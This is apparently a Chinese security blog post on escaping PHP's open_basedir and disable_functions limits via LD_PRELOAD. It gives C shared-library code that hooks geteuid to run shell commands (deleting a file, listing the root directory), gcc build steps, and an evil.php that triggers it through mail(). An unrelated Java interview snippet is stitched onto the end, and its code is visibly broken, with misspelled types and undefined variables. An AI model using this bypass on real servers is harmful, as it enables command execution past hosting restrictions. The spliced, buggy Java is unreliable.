Tianji's Blog.

LRE_PAYLOAD绕过open_basedir

web安全
Word count: 479 / Reading time: 3 min
2018/06/04 Share

LRE_PAYLOAD绕过open_basedir

参考链接:

利用环境变量LD_PRELOAD绕过disable_function执行系统命令

PHP绕过open_basedir列目录的研究

源码:

1
2
3
4
5
6
7
8
9
10
11
12
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void payload() {
	system("rm /tmp/check.txt");
}
int  geteuid() {
	if (getenv("LD_PRELOAD") == NULL) { return 0; }
	unsetenv("LD_PRELOAD");
	payload();
}

编译:

1
2
gcc -c -fPIC shell.c -o teset
gcc -shared teset -o test.so

evil.php

1
2
3
4
<?php
putenv("LD_PRELOAD=/var/www/html/preload/test.so");
	mail("a@localhost","","","","");
?>

执行evil.php ,可以发现check.txt被删除。

列目录的payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void payload()
{
    DIR* dir;
    struct dirent* ptr;
    dir = opendir("/");
    FILE  *fp;
    fp=fopen("/tmp/venenoveneno","w");
    while ((ptr = readdir(dir)) != NULL) {
        fprintf(fp,"%s\n",ptr->d_name);
    }
    closedir(dir);
    fflush(fp);
}
int geteuid()
{
    if (getenv("LD_PRELOAD") == NULL) {
        return 0;
    }
    unsetenv("LD_PRELOAD");
    payload();
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
Given a two-dimensioned bool array
Every row is sorted

0 0 0 1 1 1 1
0 0 1 1 1 1 1
0 0 0 0 0 1 1
0 0 0 0 1 1 1

O(M+N) solution to give [(1,5)]

public static AarrayList<Object> getSoulution(int[][] sortedArray,int m, int n) {
    if(m <0 || n < 0) {
        return null;
    }
    int[] indexs = new int[m];
    ArrayList<Object> solution = new ArrayList<>();
    ArrayList<Integer> minIndexs = new ArrayList<>();
    
    int min = n;
    for(int i = 0; i< m; i++) {
        indexs[i] = getFirstIndex(sortedArray[i], n);
        if(min > indexs[i]) {
           min = indexs[i];
        }
    }
    if(min == n) {
        return null;
    }
    
    for(int i = 0; i< m; i++) {
        
        if(indexs[i] == min) {
            minIndexs.add(i);
        }
    }
    
    solution.add(maxIndexes);
    solution.add(n - min);
    return solution;
}

private int getFirstIndex(int[] array, int n) {
    // 说明该行没有1
    if(array[n - 1] == 0) {
        return n + 1;
    }
    int start = 0;
    int end = n - 1;
    int middle = (start + end) / 2;
    while(true) {
        if(array[middle] == 0) {
            // middle 和 end之间
            start = middle + 1;
            middle =(start + end) / 2;
        }
        if(array[middle] == 1) {
            // 如果找到第一个1
            if(array[middle - 1] == 0) {
                return middle;
            }else {
                end = middle - 1;
                middle = (start + end) / 2;
            }
        }
    }
}

原文作者: Tianji

原文链接: https://www.tiandiwuji.top/posts/51203/

发表日期: June 4th 2018, 10:10:00 am

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. LRE_PAYLOAD绕过open_basedir
Total : 77
2099
2019
2018
pwn ctf web安全 ctf_php_debug 置顶 工具手册 dubbo jvm linux 运维 mysql php python python安全 前端 zookeeper 渗透测试 安全体系建设
安全